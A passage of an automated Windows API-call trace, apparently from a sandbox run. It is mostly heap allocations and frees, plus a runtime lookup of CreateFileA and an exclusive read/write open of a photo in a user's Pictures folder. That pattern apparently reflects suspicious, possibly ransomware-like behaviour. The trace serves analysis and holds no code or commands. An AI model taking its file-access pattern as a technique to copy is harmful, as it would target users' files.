(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.279] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0191.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba498 [0191.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba498, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0191.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.280] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0191.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0191.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba498, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0191.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.280] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0191.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0191.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0191.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0191.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg", cchWideChar=64, lpMultiByteStr=0x8db138, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg", lpUsedDefaultChar=0x0) returned 64 [0191.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.281] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\onhysixg5vz 1mhk2taa.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=64, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0191.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=64, lpWideCharStr=0x9c0b78, cchWideChar=64 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg") returned 64 [0191.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0191.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0191.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0191.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0191.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0191.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0191.285] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0191.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 